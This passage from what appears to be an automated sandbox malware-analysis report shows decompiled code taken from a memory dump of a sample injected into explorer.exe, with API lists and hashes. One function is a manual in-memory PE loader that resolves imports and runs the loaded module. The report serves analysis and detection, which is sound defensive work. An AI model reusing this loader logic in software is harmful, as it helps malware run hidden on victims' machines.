					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x110)))));
				}
				if(E02F8C9F4(_t173) != 0) {
					L4:
					_t56 = E02F8C6CE();
					_push(_t113);
					_v592 = _t56;
					E02F8C4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E02F85072( &_v580,  &_v580, _t190);
					_t126 = E02F8E2C5( &_v580, E02F8A43D( &_v580), 0);
					E02F8C6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E02F8317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x2f9c9a0);
						_t115 = E02F89A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x2f9f81c; // 0x2fb0000
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E02F898BD(_v600);
								_t130 = _t115;
								 *0x2f9f8d8 = _t66;
								 *0x2f9f8d0 = E02F898BD(_t130);
								L17:
								_push(_t130);
								_t174 = E02F8A633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x2f9c9f2);
								_t163 = 0xe;
								E02F8AAA3(_t163, _t192);
								E02F8AADC(_t174, _t192, _t115);
								_t180 = _a4;
								_push( *_t180);
								E02F8AA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E02F8B025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E02F8B025(_t166, _t192);
								}
								_t76 = E02F8A065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E02F8AA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x2f9f81c; // 0x2fb0000
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E02F90D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x2f9f81c; // 0x2fb0000
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E02F8F0DE(_t169);
										}
										E02F8584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x2f9f81c; // 0x2fb0000
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E02F8109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E02F88BAF( &_v596);
												 *_t187 = 0x2f9c9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x2f9c9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x2fb0228
									_t142 = _t40;
									L25:
									_t78 = E02F85AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x2f9f81c; // 0x2fb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E02F8D11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x2f9f818; // 0x508f6c8
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x2f9f818; // 0x508f6c8
								 *((intOrPtr*)(_t97 + 0x30))();
								E02F88BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E02F88BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t104 =  *(_t65 + 0x1898);
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
							L11:
							E02F8F1F6(_v600, _t161);
							goto L12;
						}
						E02F8F1B6(_v600,  &_v580);
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t107 = E02F83097( &_v532, _t178, 0x105);
					_t190 = _t107;
					if(_t107 == 0) {
						L41:
						E02F85F6F( &_v588);
						_t72 = _t178;
						L42:
						return _t72;
					}
					goto L4;
				}
			}


























































                                                                                                                                                                                              0x02f850b3
                                                                                                                                                                                              0x02f850c0
                                                                                                                                                                                              0x02f850cb
                                                                                                                                                                                              0x02f850d0
                                                                                                                                                                                              0x02f850d2
                                                                                                                                                                                              0x02f850d5
                                                                                                                                                                                              0x02f850da
                                                                                                                                                                                              0x02f850df
                                                                                                                                                                                              0x02f850e2
                                                                                                                                                                                              0x02f850ec
                                                                                                                                                                                              0x02f850ee
                                                                                                                                                                                              0x02f850fb
                                                                                                                                                                                              0x02f85104
                                                                                                                                                                                              0x02f85104
                                                                                                                                                                                              0x02f85111
                                                                                                                                                                                              0x02f8512c
                                                                                                                                                                                              0x02f8512e
                                                                                                                                                                                              0x02f85133
                                                                                                                                                                                              0x02f85138
                                                                                                                                                                                              0x02f8513e
                                                                                                                                                                                              0x02f8514d
                                                                                                                                                                                              0x02f8516c
                                                                                                                                                                                              0x02f8516e
                                                                                                                                                                                              0x02f85173
                                                                                                                                                                                              0x02f85174
                                                                                                                                                                                              0x02f8517a
                                                                                                                                                                                              0x02f8517f
                                                                                                                                                                                              0x02f85186
                                                                                                                                                                                              0x02f85190
                                                                                                                                                                                              0x02f85192
                                                                                                                                                                                              0x02f85193
                                                                                                                                                                                              0x02f8519e
                                                                                                                                                                                              0x02f851a0
                                                                                                                                                                                              0x02f851a3
                                                                                                                                                                                              0x02f851a8
                                                                                                                                                                                              0x02f851af
                                                                                                                                                                                              0x02f851d3
                                                                                                                                                                                              0x02f851d3
                                                                                                                                                                                              0x02f851d8
                                                                                                                                                                                              0x02f8523f
                                                                                                                                                                                              0x02f85244
                                                                                                                                                                                              0x02f85246
                                                                                                                                                                                              0x02f85250
                                                                                                                                                                                              0x02f85255
                                                                                                                                                                                              0x02f85255
                                                                                                                                                                                              0x02f8526f
                                                                                                                                                                                              0x02f85271
                                                                                                                                                                                              0x02f85274
                                                                                                                                                                                              0x02f85276
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8527c
                                                                                                                                                                                              0x02f85283
                                                                                                                                                                                              0x02f85286
                                                                                                                                                                                              0x02f8528f
                                                                                                                                                                                              0x02f85294
                                                                                                                                                                                              0x02f8529a
                                                                                                                                                                                              0x02f8529f
                                                                                                                                                                                              0x02f852a4
                                                                                                                                                                                              0x02f852a8
                                                                                                                                                                                              0x02f852aa
                                                                                                                                                                                              0x02f852ae
                                                                                                                                                                                              0x02f852ae
                                                                                                                                                                                              0x02f852b3
                                                                                                                                                                                              0x02f852b6
                                                                                                                                                                                              0x02f852b8
                                                                                                                                                                                              0x02f852bc
                                                                                                                                                                                              0x02f852bc
                                                                                                                                                                                              0x02f852c3
                                                                                                                                                                                              0x02f852c8
                                                                                                                                                                                              0x02f852cc
                                                                                                                                                                                              0x02f852cf
                                                                                                                                                                                              0x02f852d4
                                                                                                                                                                                              0x02f852da
                                                                                                                                                                                              0x02f852db
                                                                                                                                                                                              0x02f85303
                                                                                                                                                                                              0x02f85309
                                                                                                                                                                                              0x02f85310
                                                                                                                                                                                              0x02f8531f
                                                                                                                                                                                              0x02f85324
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85324
                                                                                                                                                                                              0x02f85312
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f852dd
                                                                                                                                                                                              0x02f852dd
                                                                                                                                                                                              0x02f852e2
                                                                                                                                                                                              0x02f852e9
                                                                                                                                                                                              0x02f8532e
                                                                                                                                                                                              0x02f8532e
                                                                                                                                                                                              0x02f85335
                                                                                                                                                                                              0x02f85339
                                                                                                                                                                                              0x02f8533a
                                                                                                                                                                                              0x02f8533a
                                                                                                                                                                                              0x02f85344
                                                                                                                                                                                              0x02f85349
                                                                                                                                                                                              0x02f8534c
                                                                                                                                                                                              0x02f8534d
                                                                                                                                                                                              0x02f8534f
                                                                                                                                                                                              0x02f85351
                                                                                                                                                                                              0x02f85356
                                                                                                                                                                                              0x02f8535d
                                                                                                                                                                                              0x02f853a0
                                                                                                                                                                                              0x02f8535f
                                                                                                                                                                                              0x02f85364
                                                                                                                                                                                              0x02f8536c
                                                                                                                                                                                              0x02f85370
                                                                                                                                                                                              0x02f8537b
                                                                                                                                                                                              0x02f85386
                                                                                                                                                                                              0x02f8538e
                                                                                                                                                                                              0x02f85392
                                                                                                                                                                                              0x02f8539a
                                                                                                                                                                                              0x02f8539a
                                                                                                                                                                                              0x02f8535d
                                                                                                                                                                                              0x02f853a6
                                                                                                                                                                                              0x02f853a9
                                                                                                                                                                                              0x02f853ab
                                                                                                                                                                                              0x02f853b1
                                                                                                                                                                                              0x02f853b1
                                                                                                                                                                                              0x02f853b3
                                                                                                                                                                                              0x02f853b3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f853b3
                                                                                                                                                                                              0x02f852eb
                                                                                                                                                                                              0x02f852eb
                                                                                                                                                                                              0x02f852f1
                                                                                                                                                                                              0x02f852f3
                                                                                                                                                                                              0x02f852f8
                                                                                                                                                                                              0x02f852f8
                                                                                                                                                                                              0x02f852fa
                                                                                                                                                                                              0x02f85329
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85329
                                                                                                                                                                                              0x02f852fc
                                                                                                                                                                                              0x02f8518a
                                                                                                                                                                                              0x02f8518a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8518a
                                                                                                                                                                                              0x02f852db
                                                                                                                                                                                              0x02f851de
                                                                                                                                                                                              0x02f851ec
                                                                                                                                                                                              0x02f851ff
                                                                                                                                                                                              0x02f85204
                                                                                                                                                                                              0x02f8520a
                                                                                                                                                                                              0x02f8520c
                                                                                                                                                                                              0x02f85224
                                                                                                                                                                                              0x02f85229
                                                                                                                                                                                              0x02f85232
                                                                                                                                                                                              0x02f85238
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85238
                                                                                                                                                                                              0x02f85214
                                                                                                                                                                                              0x02f8521d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8521d
                                                                                                                                                                                              0x02f851b1
                                                                                                                                                                                              0x02f851b7
                                                                                                                                                                                              0x02f851b9
                                                                                                                                                                                              0x02f851c6
                                                                                                                                                                                              0x02f851c8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f851ca
                                                                                                                                                                                              0x02f851ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f851ce
                                                                                                                                                                                              0x02f851bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f851bf
                                                                                                                                                                                              0x02f85188
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85113
                                                                                                                                                                                              0x02f8511e
                                                                                                                                                                                              0x02f85124
                                                                                                                                                                                              0x02f85126
                                                                                                                                                                                              0x02f853b5
                                                                                                                                                                                              0x02f853b9
                                                                                                                                                                                              0x02f853be
                                                                                                                                                                                              0x02f853c0
                                                                                                                                                                                              0x02f853c6
                                                                                                                                                                                              0x02f853c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f85126

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1985475764-0
                                                                                                                                                                                              • Opcode ID: 99c7c694d9c6513ea18e3bdb14a4731e69e3d60759883c9e2bfc0b5a846aa7e4
                                                                                                                                                                                              • Instruction ID: 83e7076e19e088a9980a3a1c589e9f12e6759f17f830a5600a7915963e9a9781
                                                                                                                                                                                              • Opcode Fuzzy Hash: 99c7c694d9c6513ea18e3bdb14a4731e69e3d60759883c9e2bfc0b5a846aa7e4
                                                                                                                                                                                              • Instruction Fuzzy Hash: FC81E171B043059FE714FB24DC84F7AF3E6EB84790F554A2EE6559B280EFB098058B82
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8DE26 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E02F8DE26(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x2f9c9a0);
						_t36 = E02F89A5A( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E02F88BF4( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















                                                                                                                                                                                              0x02f8de2f
                                                                                                                                                                                              0x02f8de36
                                                                                                                                                                                              0x02f8de39
                                                                                                                                                                                              0x02f8de46
                                                                                                                                                                                              0x02f8de4c
                                                                                                                                                                                              0x02f8de4f
                                                                                                                                                                                              0x02f8de51
                                                                                                                                                                                              0x02f8de56
                                                                                                                                                                                              0x02f8df2e
                                                                                                                                                                                              0x02f8df2e
                                                                                                                                                                                              0x02f8df2e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8de5c
                                                                                                                                                                                              0x02f8de5c
                                                                                                                                                                                              0x02f8de5c
                                                                                                                                                                                              0x02f8de5f
                                                                                                                                                                                              0x02f8de65
                                                                                                                                                                                              0x02f8de81
                                                                                                                                                                                              0x02f8de88
                                                                                                                                                                                              0x02f8de8e
                                                                                                                                                                                              0x02f8de92
                                                                                                                                                                                              0x02f8dea6
                                                                                                                                                                                              0x02f8dea6
                                                                                                                                                                                              0x02f8dea9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8de94
                                                                                                                                                                                              0x02f8de94
                                                                                                                                                                                              0x02f8de99
                                                                                                                                                                                              0x02f8de9d
                                                                                                                                                                                              0x02f8de9d
                                                                                                                                                                                              0x02f8dea1
                                                                                                                                                                                              0x02f8dea2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8de94
                                                                                                                                                                                              0x02f8deaa
                                                                                                                                                                                              0x02f8deaa
                                                                                                                                                                                              0x02f8dead
                                                                                                                                                                                              0x02f8deae
                                                                                                                                                                                              0x02f8deb5
                                                                                                                                                                                              0x02f8debf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8dec1
                                                                                                                                                                                              0x02f8dec7
                                                                                                                                                                                              0x02f8decb
                                                                                                                                                                                              0x02f8df24
                                                                                                                                                                                              0x02f8ded4
                                                                                                                                                                                              0x02f8dee1
                                                                                                                                                                                              0x02f8dee7
                                                                                                                                                                                              0x02f8dee9
                                                                                                                                                                                              0x02f8def0
                                                                                                                                                                                              0x02f8def6
                                                                                                                                                                                              0x02f8defe
                                                                                                                                                                                              0x02f8df06
                                                                                                                                                                                              0x02f8df12
                                                                                                                                                                                              0x02f8df18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8df2a
                                                                                                                                                                                              0x02f8deb7
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 02F8DE3B
                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 02F8DE46
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 02F8DE88
                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 02F8DEE1
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 02F8DF06
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104), ref: 02F8DF24
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1259063344-0
                                                                                                                                                                                              • Opcode ID: 895fc536e00e5ce9d2c4bdaf6fc729c406856620b63e41e726e8f62d755d501c
                                                                                                                                                                                              • Instruction ID: 0004592873c1c1130043ed5d24a3cadba759a02a0d50391e0d34dd3e5771670f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 895fc536e00e5ce9d2c4bdaf6fc729c406856620b63e41e726e8f62d755d501c
                                                                                                                                                                                              • Instruction Fuzzy Hash: B7310472D0011AEBDF38BB75C889AADF778EF153D4F104499E606E20D4E7B09980CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8E656 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8E66A
                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 02F8E672
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 02F8E686
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8E701
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8E704
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02F8E709
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: 572fca71e3fb3c313e1d9840c544c1127a93b6d81ca26157a6133f86c6507d25
                                                                                                                                                                                              • Instruction ID: 3e1f05901c51d134589774f14331be8856f3da45157eebe711aa7010301f375f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 572fca71e3fb3c313e1d9840c544c1127a93b6d81ca26157a6133f86c6507d25
                                                                                                                                                                                              • Instruction Fuzzy Hash: B221F975D00219BFDB00EFA9CC88DAEBBBDEF48694B104499F505A7250DB71AE01CBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F93D66 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                                                              			E02F93D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































                                                                                                                                                                                              0x02f93d6f
                                                                                                                                                                                              0x02f93d7c
                                                                                                                                                                                              0x02f93d82
                                                                                                                                                                                              0x02f93d8b
                                                                                                                                                                                              0x02f93d8e
                                                                                                                                                                                              0x02f93d91
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f93e82
                                                                                                                                                                                              0x02f93e86
                                                                                                                                                                                              0x02f93e88
                                                                                                                                                                                              0x02f93e96
                                                                                                                                                                                              0x02f93fb4
                                                                                                                                                                                              0x02f93fb8
                                                                                                                                                                                              0x02f9407d
                                                                                                                                                                                              0x02f94086
                                                                                                                                                                                              0x02f94089
                                                                                                                                                                                              0x02f9408d
                                                                                                                                                                                              0x02f94093
                                                                                                                                                                                              0x02f9409b
                                                                                                                                                                                              0x02f9409b
                                                                                                                                                                                              0x02f940a3
                                                                                                                                                                                              0x02f940b1
                                                                                                                                                                                              0x02f940b4
                                                                                                                                                                                              0x02f940b8
                                                                                                                                                                                              0x02f940be
                                                                                                                                                                                              0x02f940ce
                                                                                                                                                                                              0x02f940f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f940fb
                                                                                                                                                                                              0x02f940d4
                                                                                                                                                                                              0x02f940e5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f940f3
                                                                                                                                                                                              0x02f940f7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f940f3
                                                                                                                                                                                              0x02f940e7
                                                                                                                                                                                              0x02f940eb
                                                                                                                                                                                              0x02f940f0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f940f0
                                                                                                                                                                                              0x02f940d6
                                                                                                                                                                                              0x02f940da
                                                                                                                                                                                              0x02f940dc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f940dc
                                                                                                                                                                                              0x02f940c0
                                                                                                                                                                                              0x02f940c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f940c6
                                                                                                                                                                                              0x02f93fbe
                                                                                                                                                                                              0x02f93fc2
                                                                                                                                                                                              0x02f93fc4
                                                                                                                                                                                              0x02f93fd2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f93fd8
                                                                                                                                                                                              0x02f93fe1
                                                                                                                                                                                              0x02f93fef
                                                                                                                                                                                              0x02f93ffb
                                                                                                                                                                                              0x02f94007
                                                                                                                                                                                              0x02f94010
